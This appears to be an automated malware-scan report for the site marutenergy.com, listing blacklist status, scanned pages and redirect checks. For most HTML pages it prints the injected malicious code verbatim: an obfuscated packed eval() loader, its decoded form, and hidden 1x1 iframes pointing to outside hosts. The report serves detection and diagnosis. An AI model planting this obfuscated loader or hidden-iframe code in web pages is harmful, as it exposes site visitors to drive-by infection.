Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marutenergy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://marutenergy.com/ | 200 OK Content-Length: 7934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://internetcountercheck.com/?click=10703015 <iframe src="http://internetcountercheck.com/?click=10703015" width=1 height=1 style="visibility:hidden;position:absolute"> | ||
http://marutenergy.com/index.html | 200 OK Content-Length: 7934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://internetcountercheck.com/?click=10703015 <iframe src="http://internetcountercheck.com/?click=10703015" width=1 height=1 style="visibility:hidden;position:absolute"> | ||
http://marutenergy.com/about_us.html | 200 OK Content-Length: 11620 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/infrastructure.html | 200 OK Content-Length: 9831 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/product.html | 200 OK Content-Length: 11525 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/service.html | 200 OK Content-Length: 10115 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/quality.html | 200 OK Content-Length: 7560 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/feedback.html | 200 OK Content-Length: 17980 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/contact.html | 200 OK Content-Length: 9320 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))) Decoded script: document.write(unescape('%u003c%u0069%u0066%u0072%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0074%u0074%u006d%u0079%u006a%u006f%u006b%u0065%u0072%u002e%u0063%u006f%u006d%u002f%u0022%u0020%u0077%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068%u0069%u0064%u0064%u0065%u <iframe src="http://attmyjoker.com/" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://marutenergy.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://marutenergy.com/Index_img/marut_pg_1.pdf | 200 OK Content-Length: 302345 Content-Type: application/pdf | clean |
http://marutenergy.com/Index_img/marut_pg_2.pdf | 200 OK Content-Length: 300401 Content-Type: application/pdf | clean |
http://marutenergy.com/Index_img/The Rutland 913 Windcharger.pdf | 200 OK Content-Length: 201858 Content-Type: application/pdf | clean |
http://marutenergy.com/Index_img/FM1803 Furlmatic Windcharger.pdf | 200 OK Content-Length: 234204 Content-Type: application/pdf | clean |
http://marutenergy.com/Index_img/Marlec Direct 2007.pdf | 200 OK Content-Length: 300897 Content-Type: application/pdf | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: marutenergy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 17:20:24 GMT
Accept-Ranges: bytes
ETag: "28f005d-1efe-47be610f48f00"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7934
Content-Type: text/html
Last-Modified: Tue, 29 Dec 2009 23:06:04 GMT
...7934 bytes of data.
GET / HTTP/1.1
Host: marutenergy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 17:20:24 GMT
Accept-Ranges: bytes
ETag: "28f005d-1efe-47be610f48f00"
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7934
Content-Type: text/html
Last-Modified: Tue, 29 Dec 2009 23:06:04 GMT
...7934 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: marutenergy.com
Referer: http://www.google.com/search?q=marutenergy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: marutenergy.com
Referer: http://www.google.com/search?q=marutenergy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.